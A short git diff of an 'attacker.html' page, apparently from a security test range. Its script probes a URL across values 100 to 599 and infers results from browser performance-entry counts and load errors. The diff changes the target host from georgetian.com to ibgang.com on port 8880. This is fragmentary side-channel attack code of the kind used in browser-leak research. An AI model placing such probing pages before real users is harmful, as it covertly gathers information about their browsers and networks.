--- a/src/range/attacker.html
+++ b/src/range/attacker.html
@@ -9,14 +9,14 @@
 
       return new Promise((resolve) => {
         sound.onerror = () => {
-          let end = performance.getEntries().length;
           let entries = performance.getEntries();
-          return resolve(`${end - start} ${entries[entries.length - 1]}`);
+          let end = entries.length;
+          //console.log(entries);
+          return resolve(`${end - start}`);
         }
       });
 
     }
-
 
     async function run(url) {
       for (let i = 100; i < 600; i++) {
@@ -25,7 +25,7 @@
     }
     
     onload = () => {
-      run('http://georgetian.com:8880');
+      run('http://ibgang.com:8880');
     }
   </script>
 </head>
